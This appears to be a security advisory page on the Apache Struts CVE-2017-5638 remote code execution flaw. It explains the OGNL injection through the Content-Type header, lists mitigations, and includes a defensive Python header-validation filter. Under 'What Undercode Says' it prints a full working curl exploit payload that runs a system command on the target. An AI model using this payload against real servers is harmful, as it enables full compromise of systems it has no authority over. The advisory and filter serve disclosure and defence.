Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling in the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts 2 application, the parser fails and builds an error message that includes the user-supplied header value without sanitization. That message is then evaluated as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language that allows method invocation and access to the underlying Java runtime, so an attacker can craft a request whose Content-Type header contains a malicious OGNL expression. When the error message is processed, the Struts framework evaluates the expression in the context of the server application, leading to remote code execution with the privileges of the application server.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available

What Undercode Says:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-endpoint

How the Exploit Works:

Craft malicious HTTP request.

Set malicious OGNL in Content-Type.

Trigger parser error.

Execute arbitrary commands.

Protection from this CVE

Upgrade Struts immediately.

Apply official patch.

Use input validation filters.

Disable unused Struts features.
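The "input validation filter" item above corresponds to the interim workaround published with the Struts S2-045 advisory: a servlet filter placed in front of the multipart parser that validates the Content-Type header and discards any request whose value is not a well-formed media type. The following Python is an added illustration of that allowlist logic, not code from this page or from the Struts project. It rejects values carrying OGNL expression markers (`%{`, `${`), values that do not fit the RFC 7230 media-type grammar, and multipart types that lack a boundary parameter. All header values in SAMPLE_HEADERS are constructed samples; the function and variable names are this example's own.

```python
import re
from typing import Optional

# Opening sequences of an OGNL expression. A legitimate Content-Type never needs them.
OGNL_MARKERS = ("%{", "${")

# RFC 7230 token characters: what a media type, subtype, parameter name or unquoted
# parameter value may consist of. Braces are deliberately not in this set.
_TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]"
# name=value, where value is a token or a quoted-string without control characters.
_PARAM = rf'{_TCHAR}+=(?:{_TCHAR}+|"[^"\\\x00-\x1f]*")'
# type "/" subtype, followed by zero or more ";" parameters.
_CONTENT_TYPE_RE = re.compile(rf"^{_TCHAR}+/{_TCHAR}+(?:\s*;\s*{_PARAM})*\s*$")

MAX_HEADER_LEN = 256  # constructed limit; real multipart boundaries are far shorter


def check_content_type(value: Optional[str]) -> Optional[str]:
    """Return None when the header is acceptable, otherwise a short rejection reason.

    Designed to run before the multipart parser ever sees the request, so a
    malformed value is refused instead of being turned into an error message.
    """
    if value is None:
        return None  # no header, nothing for the multipart parser to interpret
    if len(value) > MAX_HEADER_LEN:
        return "header too long"
    for marker in OGNL_MARKERS:
        if marker in value:
            return f"expression marker {marker!r} in Content-Type"
    stripped = value.strip()
    if not _CONTENT_TYPE_RE.match(stripped):
        return "Content-Type does not match media-type grammar"
    media_type = stripped.split(";", 1)[0].strip().lower()
    if media_type.startswith("multipart/") and "boundary=" not in stripped.lower():
        return "multipart Content-Type without boundary parameter"
    return None


# Constructed sample headers: (label, Content-Type value). None models an absent header.
SAMPLE_HEADERS = [
    ("json-api", "application/json"),
    ("benign-multipart", "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"),
    ("quoted-param", 'text/plain; charset="utf-8"'),
    ("ognl-marker", "%{2*3}"),
    ("dollar-marker", "${2*3}"),
    ("multipart-no-boundary", "multipart/form-data"),
    ("bad-token", "multipart/form-data; boundary=ab cd"),
    ("no-header", None),
]


def triage(requests):
    """Map each labelled request to its rejection reason (None means it passes)."""
    return {label: check_content_type(ct) for label, ct in requests}


if __name__ == "__main__":
    for label, reason in triage(SAMPLE_HEADERS).items():
        print(f"{label:22s} -> {'accept' if reason is None else 'reject: ' + reason}")
```

A filter like this is a stopgap that reduces exposure while the upgrade is scheduled; the vulnerable error path is still present underneath it, so the actual fix remains moving to Struts 2.3.32 or 2.5.10.1 (the releases that shipped with the patch) and, where available, the same allowlist makes a useful detection rule at the reverse proxy or WAF, since standard access logs do not record the Content-Type header.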

Impact:

Full server compromise.

Data breach.

Complete system control.

Service disruption.


Sources:

Reported By: nvd.nist.gov